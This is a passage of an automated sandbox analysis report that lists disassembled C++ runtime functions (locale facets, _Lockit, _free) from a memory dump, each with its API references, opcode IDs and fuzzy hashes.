                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E3052B9
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3052D0
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3052F0
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3052FD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID: 8=An
                                                                                                                          • API String ID: 1767075461-2063616906
                                                                                                                          • Opcode ID: 19a1433f208d3bae1d9f62351a1e6e298944f2743b3e1caa6c6c23bc0e538bad
                                                                                                                          • Instruction ID: 81edfd91a2972bab58d5d88a860d09d40b4e034a937b5797d5773c46d7581bff
                                                                                                                          • Opcode Fuzzy Hash: 19a1433f208d3bae1d9f62351a1e6e298944f2743b3e1caa6c6c23bc0e538bad
                                                                                                                          • Instruction Fuzzy Hash: 9F01007A94051DEBCF01DBE4C855AEEB77AAF85328F200809D410AB290DF709D468790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305303, Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30530A
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E305314
                                                                                                                          • int.LIBCPMT ref: 6E30532B
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E30534E
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E305365
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E305385
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305392
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID: <=An
                                                                                                                          • API String ID: 958335874-4100119773
                                                                                                                          • Opcode ID: 1e866aa85359bc70f1628647a40ec3733f2c512ed234b703ff01c281ae0d1cde
                                                                                                                          • Instruction ID: e7e3c4896437ff999e07e4bd1089f294472dd11e626bd02765b576e1da477752
                                                                                                                          • Opcode Fuzzy Hash: 1e866aa85359bc70f1628647a40ec3733f2c512ed234b703ff01c281ae0d1cde
                                                                                                                          • Instruction Fuzzy Hash: 2B01AD7A900519EFCF05DBE4C954BFEB77AAF85318F144909E4116B290DFB09E068B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FE16B, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 78COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 6E2FE172
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1DB
                                                                                                                          • _Maklocstr.LIBCPMT ref: 6E2FE1ED
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE205
                                                                                                                          • _Maklocchr.LIBCPMT ref: 6E2FE215
                                                                                                                          • _Getvals.LIBCPMT ref: 6E2FE237
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68BB
                                                                                                                            • Part of subcall function 6E2F688C: _Maklocchr.LIBCPMT ref: 6E2F68D1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 3549167292-711905790
                                                                                                                          • Opcode ID: 837c16d7a7af90d9c3a1101e85f5b2cae4f9f0a9dd7780dd858b64ac7931bf62
                                                                                                                          • Instruction ID: 186556f33aad2e1b9461eacc802f8ff3e6df84476799c547b733a461a2a021f5
                                                                                                                          • Opcode Fuzzy Hash: 837c16d7a7af90d9c3a1101e85f5b2cae4f9f0a9dd7780dd858b64ac7931bf62
                                                                                                                          • Instruction Fuzzy Hash: 95215C75C40208EBDB159FE5D884ACEBBADEF04714F00885AF9149F245EB719A45CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E30542D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E305434
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E30543E
                                                                                                                          • int.LIBCPMT ref: 6E305455
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30548F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E3054AF
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E3054BC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: D=An
                                                                                                                          • API String ID: 55977855-1525241006
                                                                                                                          • Opcode ID: f2d02751d088fc5530bafc1d3ea4f945ad5b213ae80b85ac661a571c4a5a40c7
                                                                                                                          • Instruction ID: 74c2d2e1ae6932cbc1fc15dca3dddbf66958116285c5ba49b7b224f044fd71fb
                                                                                                                          • Opcode Fuzzy Hash: f2d02751d088fc5530bafc1d3ea4f945ad5b213ae80b85ac661a571c4a5a40c7
                                                                                                                          • Instruction Fuzzy Hash: E601C07A94051EEBCF11DBE4C995AFEB7BAAF41328F140809D4106B290DF709D46C791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E3055EC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E3055F3
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3055FD
                                                                                                                          • int.LIBCPMT ref: 6E305614
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E30564E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30566E
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E30567B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: P=An
                                                                                                                          • API String ID: 55977855-2240975974
                                                                                                                          • Opcode ID: 4194251eed908edce3729ca17fdc3717fb7a8eaf7982b6f81a787f74fa0bb1aa
                                                                                                                          • Instruction ID: 5e0571b6551071106f6e4f4a51418a34c469adc5e149f262c7ef23cce9da7aef
                                                                                                                          • Opcode Fuzzy Hash: 4194251eed908edce3729ca17fdc3717fb7a8eaf7982b6f81a787f74fa0bb1aa
                                                                                                                          • Instruction Fuzzy Hash: 8701C07A94091DDBCF01DBE4C954AEEB77AAF41328F150909D411AB2D0DF7099068791
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E305398, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E30539F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E3053A9
                                                                                                                          • int.LIBCPMT ref: 6E3053C0
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E3053FA
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E30541A
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E305427
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: @=An
                                                                                                                          • API String ID: 55977855-3582706681
                                                                                                                          • Opcode ID: cd005d659a9f3a35fcef470dbd04861d9aa8cff1b3b66f8788596929842ceee5
                                                                                                                          • Instruction ID: 574c7e52f45a66ecb9439c699394dd61d5a86dfd7a4c8c0fb7292664178eb835
                                                                                                                          • Opcode Fuzzy Hash: cd005d659a9f3a35fcef470dbd04861d9aa8cff1b3b66f8788596929842ceee5
                                                                                                                          • Instruction Fuzzy Hash: EB01C07A94051DDBCF11DBE8D854BFEB77AAF41328F240909D4106B280DF709D06CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F78F7, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F78FE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7908
                                                                                                                          • int.LIBCPMT ref: 6E2F791F
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7959
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7979
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7986
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Register
                                                                                                                          • String ID: |<An
                                                                                                                          • API String ID: 55977855-1857351383
                                                                                                                          • Opcode ID: b0488b939a8d0302058ba56c645e9625194c85893d3d967071d084f750b17d8b
                                                                                                                          • Instruction ID: 4fb8e2a2ca4667527e8595d37e783363e180a3729eb313918e177a42250b77ac
                                                                                                                          • Opcode Fuzzy Hash: b0488b939a8d0302058ba56c645e9625194c85893d3d967071d084f750b17d8b
                                                                                                                          • Instruction Fuzzy Hash: 1501AD7A94051EDBCF01DBE4C954AEEF7BBBF86318F140809D4116B280DF7099078781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E332FB2, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 285COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E32F299: GetLastError.KERNEL32(00000000,00000000,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000,00000004), ref: 6E32F29E
                                                                                                                            • Part of subcall function 6E32F299: SetLastError.KERNEL32(00000000,6E37A1A0,000000FF,?,6E327CF9,?,?,00000003,?,6E2F1083,6E2F10F4,?,6E2F0EE0,00000000,00000000,00000000), ref: 6E32F33C
                                                                                                                          • _free.LIBCMT ref: 6E3332BF
                                                                                                                          • _free.LIBCMT ref: 6E3332D8
                                                                                                                          • _free.LIBCMT ref: 6E333316
                                                                                                                          • _free.LIBCMT ref: 6E33331F
                                                                                                                          • _free.LIBCMT ref: 6E33332B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorLast
                                                                                                                          • String ID: C
                                                                                                                          • API String ID: 3291180501-1037565863
                                                                                                                          • Opcode ID: e361f3c18503e408a9b30a2ce2556fdd54acca24ed299093fe838346eb4a594b
                                                                                                                          • Instruction ID: 99ea515e45e12f0c79514554d751a49cbdb8ece6492dd1da196cae82a00036dc
                                                                                                                          • Opcode Fuzzy Hash: e361f3c18503e408a9b30a2ce2556fdd54acca24ed299093fe838346eb4a594b
                                                                                                                          • Instruction Fuzzy Hash: 4DC16B7590126A9FDB24DF68C898E9DB3B4FF08314F6085EAE859A7354D731AE90CF40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2FE244, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: MaklocchrMaklocstr$H_prolog3_
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2404127365-711905790
                                                                                                                          • Opcode ID: 367dd94f14d977b8e8492b93298f8d1ffa5873ac77cf3629bdb10f370008621a
                                                                                                                          • Instruction ID: 2b2b6961f23717f662e003459fa3f88958a3836592db1f3c2a46ff638e0874b8
                                                                                                                          • Opcode Fuzzy Hash: 367dd94f14d977b8e8492b93298f8d1ffa5873ac77cf3629bdb10f370008621a
                                                                                                                          • Instruction Fuzzy Hash: FD2136B5C40348EBDB14DFE5D884ADEBBB8EF44704F00885AE9159F255EB70DA41CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E33D4AB, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E33D196: _free.LIBCMT ref: 6E33D1BB
                                                                                                                          • _free.LIBCMT ref: 6E33D4F9
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33D504
                                                                                                                          • _free.LIBCMT ref: 6E33D50F
                                                                                                                          • _free.LIBCMT ref: 6E33D563
                                                                                                                          • _free.LIBCMT ref: 6E33D56E
                                                                                                                          • _free.LIBCMT ref: 6E33D579
                                                                                                                          • _free.LIBCMT ref: 6E33D584
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                          • Instruction ID: 1c775a92a51b382890f9de72f61c385eb80da3d32ce688500c37143a9a4e3282
                                                                                                                          • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                          • Instruction Fuzzy Hash: 2A118E31951BA4ABE660ABF0CC05FCB77BDAF00708FD04D14E2DBA6052DB35F5188AA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F67FA, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$Maklocchr
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2020259771-711905790
                                                                                                                          • Opcode ID: 5715afb7dd833c9ab8a1d7bd1d9ed5f586bdbe744dc4d6958643cb0641373ccb
                                                                                                                          • Instruction ID: 44fdaad62bf1ba765888c7cf57a7af8276d4cc1be8088f3e8da6d75041238d82
                                                                                                                          • Opcode Fuzzy Hash: 5715afb7dd833c9ab8a1d7bd1d9ed5f586bdbe744dc4d6958643cb0641373ccb
                                                                                                                          • Instruction Fuzzy Hash: C1118CB1990749BFE720CBE5D890F52F7ACEF08614F04892AF244CB640D3A5F95687E4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F1C96, Relevance: 10.6, APIs: 7, Instructions: 53COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C9D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1CA7
                                                                                                                          • int.LIBCPMT ref: 6E2F1CBE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F1CE1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1CF8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1D18
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1D25
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          • Opcode ID: ed62022c4a3d4973d3804e374bc9a9f4b5258df4367cded4524c1fb11d1d0cee
                                                                                                                          • Instruction ID: dc030ce16e7f019918c1874105f01bca27bf6eacca2a3cc1084a8cedd421c046
                                                                                                                          • Opcode Fuzzy Hash: ed62022c4a3d4973d3804e374bc9a9f4b5258df4367cded4524c1fb11d1d0cee
                                                                                                                          • Instruction Fuzzy Hash: D311E0B694011ECBCF01DBE4C954BEDF7BAAF46318F644908D4106B281DF749947CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F760E, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7615
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F761F
                                                                                                                          • int.LIBCPMT ref: 6E2F7636
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7659
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7670
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7690
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F769D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 2d2c9ead8b5d08dd4f2804e0d0b800f8b9a73c6c1f052ab573b1c80bcd82dbd9
                                                                                                                          • Instruction ID: feb0711a4f26171065421143660aa5e74c0ead1d9278157970b144ef225e1303
                                                                                                                          • Opcode Fuzzy Hash: 2d2c9ead8b5d08dd4f2804e0d0b800f8b9a73c6c1f052ab573b1c80bcd82dbd9
                                                                                                                          • Instruction Fuzzy Hash: C901ED7A84011EDBCF01DBE8C854AEEF7BBAF85328F250819D4116B2C0DF7099468B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F76A3, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F76AA
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F76B4
                                                                                                                          • int.LIBCPMT ref: 6E2F76CB
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F76EE
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7705
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7725
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7732
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 0c694bced1b854ab9ac9bbb71301d8ccadba942549df713ff02291a0cc47124d
                                                                                                                          • Instruction ID: 2485fe04350a337dd3526895c08f5e5d9e0543972f7db0376a5239c41dc83713
                                                                                                                          • Opcode Fuzzy Hash: 0c694bced1b854ab9ac9bbb71301d8ccadba942549df713ff02291a0cc47124d
                                                                                                                          • Instruction Fuzzy Hash: F701AD7A99051EDBCF01DBE4C954AEEF7BBAF86328F150809D8116B280DF709907CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F7738, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F773F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7749
                                                                                                                          • int.LIBCPMT ref: 6E2F7760
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7783
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F779A
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F77BA
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F77C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 8e3467f39db19a354c7454f66d08effc2158c2688d542488c51830b629efc314
                                                                                                                          • Instruction ID: d15846af9ef75ffae30640608132a29f4147f921fb5d6eeb0343ceb669aedce5
                                                                                                                          • Opcode Fuzzy Hash: 8e3467f39db19a354c7454f66d08effc2158c2688d542488c51830b629efc314
                                                                                                                          • Instruction Fuzzy Hash: D701ED7A85011ECBCF01DBE4C954AEEF7BBAF49318F100809D8116B290DF709A068790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F6F12, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6F19
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6F23
                                                                                                                          • int.LIBCPMT ref: 6E2F6F3A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6F5D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F6F74
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F6F94
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F6FA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          • Opcode ID: d740a2879b316c91fb22ee085e8c72e2f1b26c1970e2ad0f68978f64f0ad0c2a
                                                                                                                          • Instruction ID: 6a7909e63cdca022f7b07edfeda72980f781592a60884d48788f4d4456bb46de
                                                                                                                          • Opcode Fuzzy Hash: d740a2879b316c91fb22ee085e8c72e2f1b26c1970e2ad0f68978f64f0ad0c2a
                                                                                                                          • Instruction Fuzzy Hash: F101007A94011ECBCF01DBE4CAA4BEEF7BBAF85328F100909D4126B290DF749D028781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 6E2F6FA7, Relevance: 10.5, APIs: 7, Instructions: 49COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6FAE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6FB8
                                                                                                                          • int.LIBCPMT ref: 6E2F6FCF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6FF2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7009
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7029
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7036
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1186225044.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          • Opcode ID: ea941aed54d070b9e9ec109516b3b8d4586d45c21c052e6ff687c6cef66e8b7a
                                                                                                                          • Instruction ID: 792b636008de3f7cd69edd31434ad5e9818465f2f8eb8d3e20f63d8767550406
                                                                                                                          • Opcode Fuzzy Hash: ea941aed54d070b9e9ec109516b3b8d4586d45c21c052e6ff687c6cef66e8b7a
